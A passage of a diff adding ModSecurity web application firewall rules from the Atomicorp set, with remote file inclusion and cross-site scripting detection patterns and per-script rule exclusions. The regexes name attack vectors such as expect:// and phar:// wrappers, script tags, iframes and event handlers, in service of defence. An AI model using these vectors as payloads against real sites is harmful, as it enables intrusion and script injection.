log_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:350474,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (mt.cgi)'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:text|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:350475,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (mt.cgi)'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS "!(^(submit\+>>|>>)$)"          "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,capture,id:350247,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',chain,logdata:'%{TX.0}'"
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/text/|!ARGS:livezillacode|!ARGS:/embed/|!ARGS:fdesc|!ARGS:ldesc|!ARGS:/script/|!ARGS:xdescription|!ARGS:desc|!ARGS:design_description|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/cms/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:descr|!ARGS:/products_description/|!ARGS:match_report|!ARGS:/product_desc/|!ARGS:description_short_1|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:phpcode|!ARGS:intro|!ARGS:Snippet|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:input[Desarrollo]|!ARGS:move2|!ARGS:hoperation|!ARGS:login_form|!ARGS:/product_benefits/|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:bbcode_tpl|!ARGS:Right_photo_1|!ARGS:embedVideo|!ARGS:/^K2ExtraField/|!ARGS:mentorhelp|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:/^fck/|!ARGS:parent_name|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/footer/|!ARGS:/link/|!ARGS:text|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:(?:java|vb)?script|about|applet|activex|chrome) ?>|< ?/?i?frame|\%env)"  "t:none,t:urlDecodeUni,t:replaceComments,t:replaceNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace"
+
+SecRule ARGS "!(^(submit\+>>|>>)$)" 	"phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:lowercase,t:compressWhitespace,capture,id:350248,rev:129,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',logdata:'%{TX.0}'"
+SecRule REQUEST_URI|ARGS|!ARGS:/text/|!ARGS:livezillacode|!ARGS:ldesc|!ARGS:fdesc|!ARGS:/footer/|!ARGS:xdescription|!ARGS:/embed/|!ARGS:/script/|!ARGS:desc|!ARGS:design_description|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/wyscms/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:descr|!ARGS:/products_description/|!ARGS:match_report|!ARGS:/product_desc/|!ARGS:description_short_1|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:pay_inst_1|!ARGS:sml_prt_1|!ARGS:/form/|!ARGS:phpcode|!ARGS:intro|!ARGS:/product_benefits/|!ARGS:Snippet|!ARGS:_qf_Select_next|!ARGS:move2|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:input[Desarrollo]|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:bbcode_tpl|!ARGS:embedVideo|!ARGS:move2|!ARGS:hoperation|!ARGS:mentorhelp|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:mes|!ARGS:signature|!ARGS:paepdc|!ARGS:/VB_announce/|!ARGS:/^autoDS/|!ARGS:newyddionc|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:s_query|!ARGS:bedrijfsprofiel|!ARGS:finish_survey|!ARGS:embeddump|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/tekst/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:verbiage|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:usr1|!ARGS:resolution|!ARGS:problem|!ARGS:/^product_options/|!ARGS:eintrag|!ARGS:/edit/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:Returnid|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:business|!ARGS:/homePage/|!ARGS:/post/|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:meta_info|!ARGS:ta|!ARGS:/data/|ARGS_NAMES|!ARGS_NAMES:user[click_or_onmouseover]|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/note/|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:/header/|!ARGS:/submit/|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:text|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?(?:i?frame ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|(?:\.add|\@)import|asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc|mocha\:|!(i|t)on(?:abort|blur|change|click!s|dragdrop|focus|keydown|keypress|keyup)|onmouse(?:down|move|out|over|up)|shell\:|window\.location|asfunction:_root\.launch|\%env)" "t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:replaceNulls,t:htmlEntityDecode,t:lowercase"
+
+
+SecMarker END_RULES_91760
+
+SecRule REQUEST_FILENAME "/mt\.cgi" "phase:2,id:91761,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+SecAction "phase:2,id:91762,t:none,pass,nolog,skipAfter:END_RULES_91762"
+
+
+
+SecRule ARGS "!(^(submit\+>>|>>)$)"          "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,capture,id:361248,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',chain,logdata:'%{TX.0}'"
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/text/|!ARGS:livezillacode|!ARGS:/embed/|!ARGS:fdesc|!ARGS:ldesc|!ARGS:/script/|!ARGS:xdescription|!ARGS:desc|!ARGS:design_description|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/cms/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:descr|!ARGS:/products_description/|!ARGS:match_report|!ARGS:/product_desc/|!ARGS:description_short_1|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:phpcode|!ARGS:intro|!ARGS:Snippet|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:input[Desarrollo]|!ARGS:move2|!ARGS:hoperation|!ARGS:login_form|!ARGS:/product_benefits/|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:bbcode_tpl|!ARGS:Right_photo_1|!ARGS:embedVideo|!ARGS:/^K2ExtraField/|!ARGS:mentorhelp|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:/^fck/|!ARGS:parent_name|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/footer/|!ARGS:/link/|!ARGS:text|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:(?:java|vb)?script|about|applet|activex|chrome) ?>|< ?/?i?frame|\%env)"  "t:none,t:urlDecodeUni,t:replaceComments,t:replaceNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace"
+
+SecRule ARGS "!(^(submit\+>>|>>)$)" 	"phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:lowercase,t:compressWhitespace,capture,id:350249,rev:129,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',logdata:'%{TX.0}'"
+SecRule REQUEST_URI|ARGS|!ARGS:/text/|!ARGS:livezillacode|!ARGS:ldesc|!ARGS:fdesc|!ARGS:/footer/|!ARGS:xdescription|!ARGS:/embed/|!ARGS:/script/|!ARGS:desc|!ARGS:design_description|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/wyscms/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:descr|!ARGS:/products_description/|!ARGS:match_report|!ARGS:/product_desc/|!ARGS:description_short_1|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:pay_inst_1|!ARGS:sml_prt_1|!ARGS:/form/|!ARGS:phpcode|!ARGS:intro|!ARGS:/product_benefits/|!ARGS:Snippet|!ARGS:_qf_Select_next|!ARGS:move2|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:input[Desarrollo]|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:bbcode_tpl|!ARGS:embedVideo|!ARGS:move2|!ARGS:hoperation|!ARGS:mentorhelp|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:mes|!ARGS:signature|!ARGS:paepdc|!ARGS:/VB_announce/|!ARGS:/^autoDS/|!ARGS:newyddionc|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:s_query|!ARGS:bedrijfsprofiel|!ARGS:finish_survey|!ARGS:embeddump|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/tekst/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:verbiage|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:usr1|!ARGS:resolution|!ARGS:problem|!ARGS:/^product_options/|!ARGS:eintrag|!ARGS:/edit/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:Returnid|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:business|!ARGS:/homePage/|!ARGS:/post/|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:meta_info|!ARGS:ta|!ARGS:/data/|ARGS_NAMES|!ARGS_NAMES:user[click_or_onmouseover]|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/note/|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:/header/|!ARGS:/submit/|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:text|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?(?:i?frame ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|(?:\.add|\@)import|asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc|mocha\:|!(i|t)on(?:abort|blur|change|click!s|dragdrop|focus|keydown|keypress|keyup)|onmouse(?:down|move|out|over|up)|shell\:|window\.location|asfunction:_root\.launch|\%env)" "t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:replaceNulls,t:htmlEntityDecode,t:lowercase"
+
+
+SecMarker END_RULES_91762
+
+SecRule REQUEST_FILENAME "/systeembeheer/" "phase:2,id:91763,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390709"
+
+SecRule REQUEST_FILENAME "/admin/add_sighting\.php" "phase:2,id:91764,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/ticket_detail\.php" "phase:2,id:91765,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/createsite\.php" "phase:2,id:91766,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340095"
+
+SecRule REQUEST_FILENAME "/cleanedit\.php" "phase:2,id:91767,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/zabbix/setup\.php" "phase:2,id:91768,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/upldgallery\.php" "phase:2,id:91769,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/tooltip_result\.php" "phase:2,id:91770,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/edit_orders\.php" "phase:2,id:91771,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/tableedit\.php" "phase:2,id:91772,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390621"
+
+SecRule REQUEST_FILENAME "/admin_previewjobs\.php" "phase:2,id:91773,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/businessadd2\.php" "phase:2,id:91774,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/packages-rest\.php" "phase:2,id:91775,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/connectors/resource/index\.php" "phase:2,id:91776,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/admin/editmessagesexec\.php" "phase:2,id:91777,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/backend\.php" "phase:2,id:91778,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/imp/redirect\.php" "phase:2,id:91779,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/edetailing_nsclc\.html" "phase:2,id:91780,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390615"
+
+SecRule REQUEST_FILENAME "/wibstats\.php" "phase:2,id:91781,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390615"
+
+SecRule REQUEST_FILENAME "/admincp/plugin\.php" "phase:2,id:91782,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=380023"
+
